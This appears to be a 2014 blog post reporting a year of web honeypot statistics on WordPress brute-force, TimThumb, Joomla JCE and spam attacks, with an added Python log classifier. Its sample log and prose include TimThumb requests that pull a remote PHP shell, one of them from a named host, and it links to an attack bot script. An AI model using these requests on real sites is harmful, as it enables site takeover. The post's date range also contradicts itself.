A year of Web Attacks

My web honeypot has reached its first year, so I decided to write a summary with some statistics.

Some information about this web honeypot.
The address: https://www.malekal.com/modsec/
Attack detection is done by the ModSecurity module; every attack is captured and inserted into a database.
Attacking IPs are blacklisted for one hour.

General information

Below is a screenshot of the attacks per day.
The peaks are large WordPress brute-force attacks.
The last increase is due to better spam detection and a Joomla JCE attack campaign.




So, from 2014-09-13 to 2014-09-13 we got a total of 21516 attacks, of which:

  • 10262 WordPress brute-force attacks
  • 1405 WordPress TimThumb attacks
  • 2132 Joomla JCE attacks
  • 5401 spam attacks (and a lot are missed)

First surprise: my website is a WordPress, yet I got more Joomla attacks than WordPress TimThumb attacks.
Not many ShellShock scans.


Not mentioned above: there were also 52 PHP exploit attacks, used some time ago to spread BossaBot.
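To make the counting concrete, here is an added example (my own code, not the honeypot's) that classifies constructed access-log lines into the attack families above and emulates the one-hour IP blacklist; the request signatures are simplified assumptions, not the honeypot's ModSecurity rules.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample log (not honeypot data); format: ip timestamp "METHOD path HTTP/x" status
SAMPLE_LOG = """\
203.0.113.7 2014-10-16T19:36:08 "POST /wp-login.php HTTP/1.1" 200
203.0.113.7 2014-10-16T19:36:09 "POST /wp-login.php HTTP/1.1" 200
198.51.100.9 2014-10-16T19:40:01 "GET /wp-content/themes/t/timthumb.php?src=http://remote.example/xp.php HTTP/1.1" 403
192.0.2.33 2014-10-16T19:41:12 "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager HTTP/1.1" 403
203.0.113.7 2014-10-16T20:50:00 "POST /wp-login.php HTTP/1.1" 200
"""
LINE_RE = re.compile(r'^(\S+) (\S+) "(\S+) (\S+) HTTP/[\d.]+" (\d{3})$')

# Signatures for the three families the post counts: my own simplified checks (assumption),
# not the honeypot's rules. On a honeypot with no real users, any POST to wp-login.php is a guess.
SIGNATURES = [
    ("wordpress_bruteforce", lambda m, p: m == "POST" and p.startswith("/wp-login.php")),
    ("wordpress_timthumb", lambda m, p: "timthumb.php" in p.lower() and "src=http" in p.lower()),
    ("joomla_jce", lambda m, p: "option=com_jce" in p and "task=plugin" in p),
]

def classify(method, path):
    """Return the attack family for a request, or None if no signature matches."""
    for name, matches in SIGNATURES:
        if matches(method, path):
            return name
    return None

def summarize(log_text, ban_seconds=3600):
    """Count detected attacks per family and emulate the one-hour IP blacklist:
    a hit from an IP whose ban is still active is dropped and counted in `blocked`."""
    counts = Counter()
    banned_until = {}
    blocked = 0
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, _status = m.groups()
        family = classify(method, path)
        if family is None:
            continue
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")
        if ip in banned_until and when < banned_until[ip]:
            blocked += 1  # still banned: the firewall would drop this request
            continue
        counts[family] += 1
        banned_until[ip] = when + timedelta(seconds=ban_seconds)
    return counts, blocked
```

On the sample above the second wp-login.php hit falls inside the first one's ban window, so it is dropped rather than recorded, while the hit at 20:50 lands after the ban expires and is counted again.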


About netnames

CHINANET is by far the first netname as a source, and the second is OVH.

(Screenshot captured 2014-10-16 19:36:08)

OVH moved after the Nuclear Pack story and some tweets.
We can see a decrease around February 2014.

(Screenshot captured 2014-10-16 19:45:42)

Spam Attacks

Most of the spam attacks are spam comments on my WordPress.

China is by far the first source with 73.6%: https://www.malekal.com/modsec/graph_categories.php?t=1&a=spam
The second is Ukraine with 16.4%.


As you can see, CHINANET-FJ is the first netname with 56.9%; the second netname is UNICOM-FJ6PUTIAN-MAN (15.7%).
Blocking these netnames will probably reduce the spam on your blog.
Screenshot of the attacks from CHINANET-FJ (the last increase is due to better spam detection): around 60 attempts per day.



WordPress TimThumb and Joomla JCE

These vulnerabilities are exploited to upload a PHP shell or an upload form.

A WordPress TimThumb attempt: https://www.malekal.com/modsec/index.php?ip= (the remote URL is flickr.com.hotelkouris.gr/xp.php and leads to a PHP shell):

(Screenshots: web injection, PHP shell)

or https://www.malekal.com/modsec/index.php?ip= , which uploads an upload form.
On the attackers' side, there are a lot of bots available on some IRC servers to scan for websites and exploit several vulnerabilities.
Below is an example of the commands available in some of these bots.
Notice that the bots do not have a ShellShock scan.

(Screenshots: bot help output, JCE hack attempts, Zen Hack, Magento Shop Exploit)


As you can see, most of the attempts are blind and use web search dorks to find websites.
That can explain why I got more JCE attempts than WordPress ones: it depends on the dork used.
Also, a website with a high rank will probably get more attempts than others.
You can find a script from these bots at this link: http://pjjoint.malekal.com/files.php?read=20141016_k8m6t10y9h6

Most of these groups sell mailers, shells, etc., probably taken from hacked websites.

BlackUnix Crew

I came across a crew that seems to be very active; they call themselves BlackUnix Crew.

They have some bots to exploit:






DDoS stuff:



Defacing :


Carding stuff:


Of course, there are more professional and discreet groups that hit websites depending on extension/CMS, etc.
